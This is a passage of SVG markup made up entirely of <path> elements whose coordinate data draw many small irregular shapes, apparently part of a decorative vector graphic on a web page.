d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n <path 